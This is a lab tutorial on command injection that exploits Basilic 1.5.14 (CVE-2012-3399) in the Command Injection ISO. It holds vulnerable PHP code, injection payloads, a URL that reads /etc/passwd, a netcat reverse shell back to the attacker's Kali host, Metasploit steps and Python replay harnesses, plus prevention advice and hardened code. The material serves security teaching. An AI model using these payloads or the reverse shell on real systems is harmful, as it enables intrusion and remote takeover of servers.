Refer to the following links for related downloads and pertinent information:
https://www.vulnhub.com/entry/command-injection-iso-1,81/
http://www.pentesteracademy.com/course?id=12

Command injection is an attack in which the attacker supplies a malicious payload that the application handles improperly and passes on to the system shell, where it is executed. The vulnerability leads to remote code execution on the host on which the vulnerable application resides. Injected commands run with the privileges of the application: if the vulnerable application runs as www-data and is exploited, the attacker gets the privileges of www-data, not root (unless the application itself runs as root). The root cause is a lack of input validation combined with system calls or system-level methods (system(), exec(), shell_exec() and similar) used in the source code itself. This is illustrated with the following vulnerable code. Create a file "abc.txt" containing the text "Command injection text" in the web root, and save the PHP below as "read.php" in the same directory:

    <?php
    echo("Command Injection testing\n");
    $file = $_GET['fileread'];
    system("cat $file");   // user input is concatenated straight into a shell command
    ?>

To read a file, send a GET request to the server with the parameter "fileread" in the URL:
http://localhost/read.php?fileread=abc.txt
The output will be:
Command Injection testing
Command injection text
To exploit the command injection vulnerability in the above code, send the following request (the semicolon ends the cat command and starts a second one):
http://localhost/read.php?fileread=abc.txt;id
The output will be:
Command Injection testing
Command injection text
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The injected command runs with the privileges of the application, here www-data. Other shell separators can be used to run "id" against the vulnerable application, for example:
http://localhost/read.php?fileread=abc.txt || id
http://localhost/read.php?fileread=abc.txt && id
Note the difference in semantics: "&&" runs "id" only if "cat abc.txt" succeeded, and "||" runs it only if "cat" failed (for example because the file does not exist); ";" runs the second command unconditionally, and "|" pipes the output of the first command into the second. Also, "&" is itself a query-string delimiter, so "&&" has to be sent as "%26%26" or PHP will cut the parameter off at the first ampersand. If the application runs as root, command injection can execute any command that root can execute on the vulnerable host.
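To make the separator behaviour concrete, here is an added example (not code from the original article): a Python stand-in for read.php's system("cat $file") that replays the article's payloads, plus two controls, and reports for each whether the injected "id" actually ran. It creates its own scratch "web root" with a constructed abc.txt, so it runs offline; the payload list and the scratch directory are assumptions of this example.

```python
# Added example, not code from the original article: a Python stand-in for
# read.php (system("cat $file")) used to replay the article's payloads and see
# which shell separators actually execute the injected `id`.
import os
import subprocess
import tempfile

SAMPLE_NAME = "abc.txt"                     # constructed lab file, as in the article
SAMPLE_TEXT = "Command injection text\n"


def make_webroot():
    """Create a scratch directory containing abc.txt; it stands in for the web root."""
    root = tempfile.mkdtemp(prefix="cmdinj-")
    with open(os.path.join(root, SAMPLE_NAME), "w") as fh:
        fh.write(SAMPLE_TEXT)
    return root


def read_php_vulnerable(fileread, webroot):
    """Equivalent of PHP's system("cat $file"): the parameter is concatenated into
    a command string and handed to /bin/sh, so shell metacharacters are honoured.
    Returns what the page would show (stdout of the shell)."""
    completed = subprocess.run(
        "cat " + fileread,          # the bug: user input spliced into a shell command
        shell=True,
        cwd=webroot,
        capture_output=True,
        text=True,
    )
    return completed.stdout


def id_executed(output):
    """True if the injected id(1) ran: its output contains 'uid='."""
    return "uid=" in output


def probe_separators(webroot):
    """Replay the article's three payloads plus two controls and report, per
    payload, whether `id` executed."""
    payloads = [
        "abc.txt;id",         # ';'  runs id unconditionally
        "abc.txt && id",      # '&&' runs id only if `cat abc.txt` succeeded
        "abc.txt || id",      # '||' runs id only if `cat abc.txt` FAILED
        "missing.txt || id",  # ...so a non-existent file makes '||' fire
        "abc.txt | id",       # '|'  pipes cat's output into id, which ignores it
    ]
    return {p: id_executed(read_php_vulnerable(p, webroot)) for p in payloads}


if __name__ == "__main__":
    root = make_webroot()
    for payload, ran in probe_separators(root).items():
        print(f"{payload!r:24} id executed: {ran}")
```

The "abc.txt || id" line is the one worth remembering: against an existing file it returns only the file contents and no uid line, which is easy to misread as "not vulnerable" during a test.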

Lab setup required for command injection pentest:

- Kali Linux (Bridged or NAT). Attacker Kali Linux IP is 192.168.1.102
- Command Injection ISO (Bridged or NAT). Target IP is 192.168.1.103

Understanding the look and feel of command injection ISO:

The Command Injection ISO lets us log in to the OS and take a close look at the vulnerable applications. To do this, log in to the Command Injection ISO with the username "securitytube" and password "123321". Then check port 80 on the Command Injection ISO (192.168.1.103) from Kali, for example with nmap -p 80 192.168.1.103, and browse to http://192.168.1.103/ to see the index page.

As seen on the index page, many vulnerable applications are installed for exploitation practice. We will work with Basilic 1.5.14 in this article. Basilic is a bibliography server used by research labs: it automates the publication and diffusion of research papers on the internet, generates web pages from the publication database, and provides indexing, searching and various other options. Basilic requires PHP, Apache and MySQL for installation and configuration. To download, configure and install Basilic, see: http://artis.imag.fr/Software/Basilic/ Now click on the basilic folder on the index page to open the application.

Searching the internet for an exploit turns up CVE-2012-3399, which describes improper input validation in Basilic; the SecurityFocus entry is at: http://www.securityfocus.com/bid/54234/exploit The exploit entry provides the vulnerable URL that leads to remote code execution.

The exploit shows that the "diff.php" file in the /basilic/Config directory does not sanitise its "file" parameter before passing it to a shell:
http://www.example.com/basilic/Config/diff.php?file=%26cat%20/etc/passwd&new=1&old=2
This is not obfuscation but URL encoding: %26 is "&" and %20 is a space, so the decoded value of "file" is "&cat /etc/passwd". The ampersand has to be encoded because an unencoded "&" is interpreted as the start of the next query-string parameter, and "file" would arrive empty. A pipe character does not need encoding, so the same exploit can be written as:
http://www.example.com/basilic/Config/diff.php?file=|cat /etc/passwd&new=1&old=2
Sending this request to the target executes the command and returns the contents of /etc/passwd in the response.

The file parameter can also be used to get a reverse shell. Start a listener on Kali:
root@kali# nc -lvvp 3333
Then set the file parameter so that the target connects back to the Kali IP (192.168.1.102); do not use 127.0.0.1, which from the target's point of view is its own loopback interface, where no listener is waiting:
diff.php?file=|nc -v 192.168.1.102 3333 -e /bin/bash&new=1&old=2
This relies on a netcat on the target that supports -e (netcat-traditional); if it does not, another reverse-shell payload (bash /dev/tcp, python, perl) can be sent through the same parameter.

The vulnerability can also be exploited with Metasploit on Kali. Searching exploit-db with the searchsploit tool in Kali:
root@kali# searchsploit basilic
returns a Ruby exploit for Basilic.

Since the exploit is written in Ruby, it is also available as a Metasploit module. Search for it in the MSF framework:
root@kali# service postgresql start
root@kali# service metasploit start
root@kali# msfconsole
msf > search basilic

The search returns an arbitrary command execution exploit for Basilic. Now select, configure and run it as shown below:

msf > use <the Basilic arbitrary command execution module returned by the search>
Module options:
    set RHOST 192.168.1.103
    set RPORT 80
    set TARGETURI /basilic-1.5.14/
Payload options:
    set LHOST 192.168.1.102
    set LPORT 4444
Finally:
    exploit
(TARGETURI is the name Metasploit's HTTP exploit modules use for the base path of the application; set it to the directory Basilic is installed in on the target.)

We have thus successfully exploited a command injection vulnerability in Basilic and obtained www-data privileges on the target, i.e. the privileges of the web server the application runs under, as explained above.

How to prevent command injection:

The developer should implement proper input validation: validate user-controlled values against an allow-list of what is expected (for a file name, a fixed set of names or a strict character class such as [A-Za-z0-9_.-], with no path separators) and reject everything else, rather than trying to strip shell metacharacters from arbitrary input. User input should never reach a shell: avoid system(), exec(), shell_exec(), passthru() and backticks in the backend code and use the language's own APIs instead (file_get_contents() rather than system("cat ...")); where an external command is unavoidable, pass the validated input through escapeshellarg() as a single argument and never concatenate it into the command string. The application should run with least privilege, so that a successful injection is confined to an unprivileged account and cannot reach the rest of the system.
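Here is an added example (not code from the original article) that puts the three rules side by side with the vulnerable pattern: a Python version of read.php's system("cat $file") next to a hardened reader that allow-lists the file name, confines the resolved path to the web root and reads the file without any shell, plus a variant for the case where an external program really is required (validated input passed as its own argv element, shell=False). The allow-list pattern, the ".txt" restriction and the scratch web root with its constructed abc.txt are assumptions of this example; the PHP equivalents are file_get_contents() and escapeshellarg().

```python
# Added example, not code from the original article: the read.php handler as
# the article wrote it (shell + string concatenation) beside a hardened version
# that follows the prevention advice, so the same payloads can be replayed
# against both.
import os
import re
import subprocess
import tempfile

# Allow-list (assumed policy): what a legitimate file name may look like, and
# what may be read. No path separators, no leading '.' or '-'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")
ALLOWED_SUFFIXES = (".txt",)


class RejectedInput(ValueError):
    """Raised for anything that does not match the allow-list."""


def make_webroot():
    """Scratch directory with the constructed abc.txt, standing in for the web root."""
    root = tempfile.mkdtemp(prefix="cmdinj-")
    with open(os.path.join(root, "abc.txt"), "w") as fh:
        fh.write("Command injection text\n")
    return root


def read_vulnerable(fileread, webroot):
    """As in read.php: system("cat $file"). Metacharacters reach /bin/sh."""
    return subprocess.run("cat " + fileread, shell=True, cwd=webroot,
                          capture_output=True, text=True).stdout


def validate_name(fileread, webroot):
    """Allow-list validation plus path confinement; returns the resolved path."""
    if not SAFE_NAME.match(fileread) or not fileread.endswith(ALLOWED_SUFFIXES):
        raise RejectedInput("file name does not match the allow-list")
    path = os.path.realpath(os.path.join(webroot, fileread))
    if os.path.dirname(path) != os.path.realpath(webroot):
        raise RejectedInput("path escapes the web root")
    return path


def read_hardened(fileread, webroot):
    """No shell at all: validate, then read with the language API
    (the PHP equivalent is file_get_contents())."""
    with open(validate_name(fileread, webroot)) as fh:
        return fh.read()


def read_hardened_argv(fileread, webroot):
    """If an external program is unavoidable: validated input passed as a
    separate argv element with shell=False, so ';', '|' and '&&' are just
    bytes in a file name (PHP: escapeshellarg() on the argument, never on
    the whole command string)."""
    path = validate_name(fileread, webroot)
    return subprocess.run(["cat", path], capture_output=True, text=True).stdout


def is_rejected(fileread, webroot):
    """True if the hardened reader refuses the input."""
    try:
        read_hardened(fileread, webroot)
    except RejectedInput:
        return True
    return False


def replay(webroot):
    """Per payload: (did `id` run against the vulnerable reader?,
    was the payload rejected by the hardened reader?)."""
    payloads = ["abc.txt", "abc.txt;id", "abc.txt && id", "abc.txt | id",
                "../../../etc/passwd", "/etc/passwd"]
    return {p: ("uid=" in read_vulnerable(p, webroot), is_rejected(p, webroot))
            for p in payloads}


if __name__ == "__main__":
    root = make_webroot()
    for payload, (ran_id, rejected) in replay(root).items():
        print(f"{payload!r:24} vulnerable ran id: {ran_id!s:5} hardened rejected: {rejected}")
```

The path-confinement check is deliberately kept even though the regular expression already excludes "/": it is the second line of defence if the allow-list is later loosened, and it costs one realpath() call.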

References:
https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=26238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3399
http://www.securityfocus.com/bid/54234
https://www.owasp.org/index.php/Command_Injection
http://artis.imag.fr/Software/Basilic/